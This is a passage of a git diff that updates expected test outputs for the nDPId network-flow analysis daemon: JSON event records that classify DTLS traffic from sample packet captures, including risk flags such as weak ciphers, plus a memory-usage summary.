+01239{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1556606275726,"flow_last_seen":1556606276035,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":2104,"flow_avg_l4_payload_len":526,"midstream":0,"thread_ts_msec":1556606276035,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"DTLSv1.2","client_requested_server_name":"","ja3":"3c3d129780d0066cd8936a6291a8d44f","ja3s":"d45798bc098cd930de7eb2f5f866e994","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01067{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1556606275726,"flow_last_seen":1556606278645,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":5138,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1556606278645,"l3_proto":"ip4","src_ip":"10.186.198.149","dst_ip":"35.210.59.134","src_port":39347,"dst_port":44443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"DTLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 
00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"dtls_certificate_fragments.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":5138,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1556606278645} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870067 bytes -~~ total memory freed........: 5870067 bytes -~~ total allocations/frees...: 118136/118136 +~~ total memory allocated....: 6003701 bytes +~~ total memory freed........: 6003701 bytes +~~ total allocations/frees...: 120898/120898 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 482 chars ~~ json string max len.......: 1244 chars diff --git a/test/results/dtls_mid_sessions.pcapng.out b/test/results/dtls_mid_sessions.pcapng.out new file mode 100644 index 000000000..bcb79e23e --- /dev/null +++ b/test/results/dtls_mid_sessions.pcapng.out 
@@ -0,0 +1,40 @@ +00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1644251732783} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732783,"flow_last_seen":1644251732783,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1644251732783,"l3_proto":"ip4","src_ip":"53.214.238.65","dst_ip":"199.186.151.155","src_port":53558,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1644251732783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1644251732783,"pkt":"AAAAAAAAAAUAH77DCABFAAB5TfQAAHkRcBI11u5Bx7qXm9E2AbsAZQC2FwEAAAEAAAAA1BUAUFbLHE7KkMRUAMa+BCcg\/DTD4cWbj4CR\/ou6\/eEj1qcEoJjrsJeHH7KwZMNGTwAG1rS\/\/iatJdFhJzn0FDJ0hSfdwvHN8cKVzNzbvFPCN5Gy"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732783,"flow_last_seen":1644251732783,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1644251732783,"l3_proto":"ip4","src_ip":"53.214.238.65","dst_ip":"199.186.151.155","src_port":53558,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732795,"flow_last_seen":1644251732795,"flow_idle_time":200000,"flow_min_l4_payload_len":378,"flow_max_l4_payload_len":378,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1644251732795,"l3_proto":"ip4","src_ip":"135.215.56.198","dst_ip":"124.73.140.89","src_port":443,"dst_port":61189,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1644251732795,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1644251732795,"pkt":"AAAAAAAAAA0A4CzfCABFAAGW4ZIAAPMRG4SH1zjGfEmMWQG77wUBgjnKF\/79AAEAAAAMGs0BbbJE\/pYaT4dviGdRi2WOW3oR6c89g2R+B6cawD8bIDdGtNIdChofe7UWFvQsORIVWYmmB1ARH2\/YcAr2riegnyfmmD5WNzjlTxQKV6PsE39+eKr8boH2o8jfYvfY6pYtfswzpn9K6hafEVXA2FkG+xAviECcyUgulZBKj4E9uB5YFuX0y7TxSC60ET9QuiIYZ4UUay4t2BEEd5FC6C5uWNuKgCANMbDPWWDHNenOhqCQ0yF83uBqHq5r406ipnTN4XmSI+EDNc9u2FN1pMCLrm4dBrNrnCATji9ZfGECArYgjEqRBAyHOL2Vvc56w\/Qgv8pMx2l0H\/kzzxsaovLIADZ0nv90fLwWxgJh5LTsHegomfRJxO6vDkSmbGbpSLoc1i0NS6B5uEf0iwFQrPlN8SwGIkJI3yry5\/bY50nqmbGvAmRGRPr67RoYsMs3XyFBKaVKTGI+C7wl3+a9aZ7IG79al3N\/ir30CorciRns"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732795,"flow_last_seen":1644251732795,"flow_idle_time":200000,"flow_min_l4_payload_len":378,"flow_max_l4_payload_len":378,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1644251732795,"l3_proto":"ip4","src_ip":"135.215.56.198","dst_ip":"124.73.140.89","src_port":443,"dst_port":61189,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
+00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732819,"flow_last_seen":1644251732819,"flow_idle_time":200000,"flow_min_l4_payload_len":1243,"flow_max_l4_payload_len":1243,"flow_tot_l4_payload_len":1243,"flow_avg_l4_payload_len":1243,"midstream":0,"thread_ts_msec":1644251732819,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"121.152.255.238","src_port":443,"dst_port":8460,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1644251732819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1285,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1285,"pkt_l4_len":1251,"thread_ts_msec":1644251732819,"pkt":"AAAAAAAAAAwAL85GCABFAAT3jYAAAD8RW4Cql2nXeZj\/7gG7IQwE469EF\/79AAEAAAAOADMEzpBZfrcT0WIwMaDtBJeOBmxdcsJNOoXMZL6URfohbDk+fMmixVNI9xolr8+oLL1F4twNjv+WWISFzhnbON+quhvr\/URpD+ws1Hw5ypw9kryCC3Gz\/V0VjiX8Xc\/vtdTUbPgNhVWHd4bAhh40ADLhQPQkBAsCOtbK+iLtMag8MKHa7XNeUssDEU2YZ+LVLTSuMPPRFA7Bn70EZWs\/DCi27ASgPoWey+zwI1xIXuPrzL3CEE0ryC7xCVWmB7SiiwnTXaWTMiWuKckduKf2vcqeUInANsr5N7tIclBo8npD6Wv5TYmAETN2yU8Nm\/538q30IPqbVb+BDK3Mm8YWXVJwGjPmfJMeSqlurhbLk+lY8A7H5w4CNWa5sLnwiYR0t1nGGT+c6gH4t9io9FfDfRocu2Hs8MORtesCyko\/XlrpKkxc7dT+hoUQ2Ig6qEPXA3sYuuaHBk29mkEb0AQ5r3Yeoi2i9uz3LKLmrnRHrUK\/fmzNPiFJaxXPVKpQfGCdE0kEm5BCPbK9vfyBOOB3\/7sYIoj0zRw0ujkmi\/fms\/mWUCW\/DAq0p0bR5iVVH+Ngw2uqr6zQEm4XRGnGZFmuu0l0H6YD3Eb1B2UCW9vuErCQHHIww4lSfamNKn\/MNTatiSE9AEGAXFnsatbLq1Z5io9Y\/TdYF6+t1UHJOwZwD7b9V9i+mtPfgQLl8NiU2j0hMADfqqZO+d6StX4ZPzcJzKEOTgyaK0nvBKJhkOP0NgYPHYSdDxApEbupq0dKHpaNbacM2uKwu504erdoidcewH\/7L7YuIPeHxN8B2CxpNmSaolF2ih\/soS48V5\/y2G2vsTf20WLKhZOVAc2HAwSJWppTXIXZ2ymaI2ccqmtA+Jj1Sh\/aySJmCNJgQRb+Tcb4UAIe2s7Ss0ohk
8dIJaV1VTOiYqi2PO\/cmF2fbWjn7YCBHVONNgmgwVurzrLR\/7LKD6+RtyeBaiIiRznG7koq5+WUC4s4lIhOAXYNXcFJlGpDczzjCsWhAucM29DaONa7p6yAmBSnUB\/yr6Ovdz\/0qrxF0A2mKqF9Fr8wa1k2+IVlWXdO5M8MrkylBlafgM+pBrC++fqAsB5Z8ntzGyEEAIhIguvUc7eEMfLb8ompiZN0LG\/UQFL8Hdeydye8KizDxkDbrTMl+gvHDUgxrwrHaNEfQLZEE9yOxjouCuzqHoOHaNLdHXriALPdgO8PgZg52Nl0rFNULXT9vXKUz77IS3AzkI0jn3jD4IUvZGga3YFZwaH\/U061fPLL4j+BBr50LUISnA80AXu8pkPA+ItEniZjyvqJbWwUiGDKodjVfcrlS0rEunQNIk1gZJIvR9OfRy2oQ+VN6aSshdDXKDEBImK+wljVdTA53XPi5\/MccimOI9bmxkLRSSaFifU8SwSGq79LgaobQpMdKTgkyZj4oryYIvGYLwbOQOlxuysPSmzwLQSgG62CyC9PDl93WjiS04EZ2I8t0QapYhEHiYvaC6XnL5vFE61pGN6LvAFh8VjcHdTgX+xBxR7SDTPMEMIjTHgXfKH7wy5Cg3nULpAYX6cJGMwlbrjXj8yi+MUAjhinxtvIPi08w3jd2aoqmwKJ16S\/lRU2isekmVfixMPHHoKAkMAhFQvyUcTC5r0kOs5hmQ=="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732819,"flow_last_seen":1644251732819,"flow_idle_time":200000,"flow_min_l4_payload_len":1243,"flow_max_l4_payload_len":1243,"flow_tot_l4_payload_len":1243,"flow_avg_l4_payload_len":1243,"midstream":0,"thread_ts_msec":1644251732819,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"121.152.255.238","src_port":443,"dst_port":8460,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
+00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1644251732824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1644251732824,"pkt":"AAAAAAAAAA0A4CzfCABFAADqm5gAAPMRYiqH1zjGfEmMWQG77wUA1gTeF\/79AAEAAAAMHEgAwbJE\/pYaT4jqSUPNYrxJL8Codo+NI1ON15wpo0UXGwutN5NqnUCtT4dyFWAwgXODy+FvALQSrXC5ZUWgnBdE5XT3NYf0YexgHZ5a2Idl8QW41Rj7Lf2MjzpVZcdBplQYlFQw8nR6sXhVOTnwn+aZxjvNjegLOT\/kssRbnCbEZBdFElSPioELBFUc51QWw1KkVU7sCAsrnomfJlGQXKgbAgDCxy96WQjMbwdI0DC9j1PjopVLRsWpCdrq61oMc+AXpbs="} +00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1644251732837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1644251732837,"pkt":"AAAAAAAAAA0A4CzfCABFAAGul4wAAPMRZXKH1zjGfEmMWQG77wUBmmGkF\/79AAEAAAAMHEsBhbJE\/pYaT4jtxwUFArtWMM0UapEkJqGElOoBLeIEH2dap\/HHoRfD+WZCZVeWcfs89omPS71pdPjHruF4M8hY0GDqFGaq4hwXSFhdKzQYz9O+XrC2R3kLNO+7d9ahfIZgOf3IzVC3go+4VnJWVPbutZawFrPDHu4OI2DkufkbgN2w2MdfyHY7tFIv3sv9Yec+tmHqp+TfY\/7K48nV\/SpID+BxX8vM1sjsa38xKBOp231zDMTPzXJ6BXVnEv38pt+e6QYodnl8j0\/\/iNXd\/0ygBx2Gbs+PMnBPhRl6mKflFEu+Rd1rHxB+cdW9TD5Zu0JuceAevKUzl8EhV8zP0uj8u2txE2Wy+x7Ur2Sf3iDsNtMEnmSFOBlZ4L0kTTNdryI+9vkWxgqkIpD+tTHrsbvnuosn8rINm4EEiwmOHxT5Txkfi0nQj3KhwBB\/CrnZUgKygw4AqCnOteFXYUOpGWPiW3ph5GOerUZvQJGtAXvFm9GNRbBLrfJbU+1TGc+0prjKcuXwKJXs"} 
+00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732859,"flow_last_seen":1644251732859,"flow_idle_time":200000,"flow_min_l4_payload_len":1453,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":1453,"flow_avg_l4_payload_len":1453,"midstream":0,"thread_ts_msec":1644251732859,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"72.102.179.218","src_port":443,"dst_port":62811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +02423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1644251732859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1495,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1495,"pkt_l4_len":1461,"thread_ts_msec":1644251732859,"pkt":"AAAAAAAAAAwAL85GCABFAAXJjqAAAD8R1tSql2nXSGaz2gG79VsFtfY\/F\/79AAEAAAAB\/fEFoF3h0hdGzu1TA0QyQd7pCFDSC3afBB7oBt63isvB1x36GJE6p5uYZLqeMCF8Kq0L9np57tsKxCxlUs+HEPNPgjqe\/5xfHnAfj07cLfClN5VTtTUB5qb\/Uzgw\/vvP21xao12ZqooD5yTV1LTW6vA7if2PeOLOISFIxtnk7K2YvqcYKSdlvHG6yR+nEkUYbU6TN2Si0w3F\/bXRIVZn\/utSvUrMMpJQJGoyc7+0D7gvTiD9elmM37eoGxMYN55aok\/Rqv5EzI9hLqHql4oyLrfR42TDTlKAkRrc8o4qI6IJa2LOra10lxuvJr\/k1kRymQi6OxdIBknFY9dxgj5ObzX8O8pZOayh3UP4Vz2Jf9AKuKYkDQt849LLzHcrz0KblbvSBh2+N16WkmUh4djf9UB8Gz1JDPiAayjCAJw5hmhil7+YLZ296spISGAB5r+u2tjzsifTOVhY7bN2UxxQL0fIlvoaWY\/y9\/ZCMN\/+nJC7y\/XaroqRUKCqLjMYIujedrY1z0fJdM0JfAxaURRtxuDg6RFwNJnO9cLRQvh2RBzs\/gEowITgrTOESBsB55ioZA+Tux2j7WJNEhcOrgqTxI1bbJVWgffituxrnfBek0e9qluQHI\/txOueYvkNqy+HmJuv6W9AqBW3FLdr3Vvac5XD4DcALe3OScCVumc+FhPk75xVgGSkCoI4G0TrOiDufPdLg8z2pt3BUcoLG3IOtO+HLK7pOSMmXHAtxLVvAmBgQRWFG2JQmfDm8onH1OYL8Iltb4x64j6qzL6hMWdqlw+a\/02Thb3V8PyMIouKtfvvmtMlyz08F\/FoFzYRF\/35lnpkyu7ILHtXf1gpl0BZFCjkiCrF80wOmxr34kk1Gh1nYmpvmR2c1gELo7egBTM4KmQu9zFJfddi1
h5O5opVp2pZuvj7z0f+FQazcpP4K9W13C5doxhwqXYYRZUtt4pqSg7VuALKfHsI\/K4Nx5Pzjd8Iq83sBzE+Sij3K\/EOkb5S9OiJ5d4w\/8wChDtFtsZpbRqkgwtGZ4TnrZnmSWbnnYYmGLqkMVmQuWU3rujzIrOQB3K0aG7ROps9lH7HqkjO+xYl5kdVzAGlgBs4BUa5byQ9qr7+gASs2al+BeQGeNCk2lpX2dqMAWnlf9SFESF2PJ\/+D6wtsuLQNHWW98GDiQpZzl+TQEPv6M1IetlQnSEOrzTPvlVQ0qow\/isWdiWwy8jpT8kNltVS+TkyWuH33iJfs3osf1kc5j7VlJaSBFpBjStPiqCDgKjsbq+6tvZLCOrEhWktxUlyr4aS9FORJj6ifTHGiv9WaymbCyoyXZJIFaxmPOAb7c5uS\/0cFN3bjuM3H7QT7GWZlj6gyPR9zg4bGxlM97TWOC4d3ARcYsEBlv8VHv18CdgJohP47cPxOB9a+opIrMkOrhFGrrK44v+vTKioNn1c8+f9NCG8Fbxr5tdxL7fxVfgjuqbXOIBakcJUzdLWRNsAzRKgrPtIANoM9cxCLHkQD90heWs8wEJNR32F2du7L9Qj1wLSY255H+1dRBEN8sdZF3daSWc6HVfsiBsrKqYjNzYxgRW9EdxQnKRaUyEHb86zwYV+sCsCdtwBsST+orAadvLP+wODDjxGrp9hm5xmQsK0\/f+1q95HNtla\/h6LX2PUKlV9s\/xr32qoZMz5UYCZspfSbz\/g8qULof8RlfM8mCMFFROIBVYtfH3DfZvErVwl5dv6Ws2OhC7zPqb2i5xtt3COdOQq\/9wpconfg6RsNV4FfxrLV9+c1vSJ4BpssIk13lXRoHchuE7VyZo0yumolNBEM51qkcDI6ZUDyZOm4xRNlKZ4zHbJKFbfP6fXjB+0\/\/eyWSigKAUOj3m6IU\/DBl7etveDbav3int0J2aVp9BTKqRhvW7r4DdpbGP0lgAopZGSAdRjWrFa\/w=="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644251732859,"flow_last_seen":1644251732859,"flow_idle_time":200000,"flow_min_l4_payload_len":1453,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":1453,"flow_avg_l4_payload_len":1453,"midstream":0,"thread_ts_msec":1644251732859,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"72.102.179.218","src_port":443,"dst_port":62811,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
+00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1644251732895,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1644251732895,"pkt":"AAAAAAAAAA0A4CzfCABFAAB5eiMAAHURPVt5mP\/uqpdp1yEMAbsAZRo2F\/79AAEAAAAMhRMAUKWzGmfeg9vDd7\/B3T+kirAR7zq6Tf8oB5f1Qe4Uo6LIUlneZEoesMiQtJMzhmqS3RqJKvvRB2aCGmdCfvmL62icrVJNR6\/VZ+07XbOviqwQ"} +00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1644251732899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1644251732899,"pkt":"AAAAAAAAAA0A4CzfCABFAAEXWbEAAHsR1HVIZrPaqpdp1\/VbAbsBA4vCF\/79AAEAAAABzVAA7sDAOt7ZNYadwFH6SHccSVCdGOeDS5VAVNAWpaw7BhQgb+1bCi82Zlyb4VWcAVH\/n1elQ7THJB3xDUKy4xtskzMRGshyDl5w6kBiV+\/uymBxK+YhMTQUTq1HeBxB7zUOp+X+xuu7HM616iGjTAfQnnvrYWz\/HmxBxjmowsnmxGXDMK7PSSumdsoeyWUI738iBD4CXuuT0D1mQ3mFUW6\/Pk13ysfBe5VqGzIqxDG7bUTMvbDlBM25yv2N52iEk51XTxj0yy9gjACGD6yvi0albjjmw6qqv2ayTvP7YsK8J5EjIW\/WNb6g+p99LqUDPkA="} +00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1644251732904,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1644251732904,"pkt":"AAAAAAAAAAwAL85GCABFAAB5j\/YAAD8RXYiql2nXeZj\/7gG7IQwAZQo0F\/79AAEAAAAOADoAUJBZfrcT0WI3vKOvm48zQRKNwV9xk31D25d9i4LGPOZLsa\/MxEM\/iT8j5X2NeXzZcl7g81+pOvAYTMQ6CMg7uw6mEidESPz\/p+RCZ0ysmpq9"} 
+00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1644251733036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1644251733036,"pkt":"AAAAAAAAAAwAL85GCABFAACskrIAAD8R19+ql2nXSGaz2gG79VsAmK\/7F\/79AAEAAAAB\/fQAg13h0hdGzu1WNO2vU\/IbgHdYF0RFMS34pXUQgZKyQWeJANVsXGZq+9MFiIsKjl3D7HT8luq5HJMe4S4Zb3zMPZ6zO4gT5DOoVt7Is6ObHtcjGB0kUDwHIjrh3nhApNylKNWwtoR5rdprjwF7EWz\/b9mEcMLFaMAE3VniOUA3LqrIzirj"} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1644251732795,"flow_last_seen":1644251733063,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":1339,"flow_tot_l4_payload_len":7981,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"135.215.56.198","dst_ip":"124.73.140.89","src_port":443,"dst_port":61189,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1644251732819,"flow_last_seen":1644251733371,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":17146,"flow_avg_l4_payload_len":571,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"121.152.255.238","src_port":443,"dst_port":8460,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1644251732783,"flow_last_seen":1644251732783,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":93,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"53.214.238.65","dst_ip":"199.186.151.155","src_port":53558,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":91,"source":"dtls_mid_sessions.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1644251732859,"flow_last_seen":1644251736135,"flow_idle_time":200000,"flow_min_l4_payload_len":93,"flow_max_l4_payload_len":1453,"flow_tot_l4_payload_len":8826,"flow_avg_l4_payload_len":294,"midstream":0,"thread_ts_msec":1644251736135,"l3_proto":"ip4","src_ip":"170.151.105.215","dst_ip":"72.102.179.218","src_port":443,"dst_port":62811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DTLS","breed":"Safe","category":"Web"}} 
